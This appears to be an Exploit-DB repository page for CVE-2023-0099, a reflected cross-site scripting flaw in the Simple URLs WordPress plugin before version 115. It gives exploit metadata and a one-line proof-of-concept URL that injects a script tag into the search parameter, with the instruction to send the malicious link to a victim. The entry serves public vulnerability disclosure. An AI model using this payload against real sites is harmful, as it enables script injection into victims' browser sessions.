0c65b881ba
10 changes to exploits/shellcodes/ghdb Milesight Routers UR5X_ UR32L_ UR32_ UR35_ UR41 - Credential Leakage Through Unprotected System Logs and Weak Password Encryption WhatsUp Gold 2022 (22.1.0 Build 39) - XSS Clinic's Patient Management System 1.0 - Unauthenticated RCE Curfew e-Pass Management System 1.0 - FromDate SQL Injection GYM MS - GYM Management System - Cross Site Scripting (Stored) MISP 2.4.171 - Stored XSS TASKHUB-2.8.8 - XSS-Reflected Wordpress 'simple urls' Plugin < 115 - XSS
24 lines
No EOL
659 B
Text
24 lines
No EOL
659 B
Text
# Exploit Title: simple urls < 115 XSS
|
|
# Google Dork:
|
|
# Exploit Author: AmirZargham
|
|
# Vendor Homepage: https://getlasso.co/
|
|
# Software Link: https://wordpress.org/plugins/simple-urls/
|
|
# Version: < 115
|
|
# Tested on: firefox,chrome
|
|
# CVE: CVE-2023-0099
|
|
# CWE: CWE-79
|
|
# Platform: MULTIPLE
|
|
# Type: WebApps
|
|
|
|
|
|
Description
|
|
The Simple URLs WordPress plugin before 115 does not sanitise and escape
|
|
some parameters before outputting them back in some pages, leading to
|
|
Reflected Cross-Site Scripting.
|
|
|
|
|
|
Usage Info:
|
|
|
|
send malicious link to victim:
|
|
https://vulnerable.com/wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=
|
|
<script>alert(origin)</script> |